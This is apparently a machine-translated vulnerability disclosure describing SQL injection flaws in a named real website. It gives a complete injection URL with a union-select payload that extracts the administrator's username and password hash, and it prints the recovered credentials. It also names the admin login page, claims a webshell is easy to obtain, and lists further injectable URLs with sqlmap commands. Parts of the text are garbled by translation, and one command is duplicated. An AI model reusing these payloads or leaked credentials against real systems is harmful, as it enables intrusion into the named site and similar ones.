Wasu sub-station Multiple SQL injection to easily obtain webshell (system permission)
Rt
http://os.wasu.cn/new/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
Get the admin account and password: admin 7d1e9c6a6bb29f1e (zzyking)
Into the background (http:// OS .wasu.cn/new/zzy_dede/login.php) very easy to get shell
Http:// OS .wasu.cn/lx/mail.php? Id = 1
Http:// OS .wasu.cn/liuchen/mail.php? Id = 1
Some data obtained
sqlmapx.py -u "http://os.wasu.cn/lx/mail.php?id=1" --dbms mysql --current-db
Sqlmapx. py-u "http:// OS .wasu.cn/lx/mail.php? Id = 1 "-- dbms mysql -- current-db
Solution:
Upgrade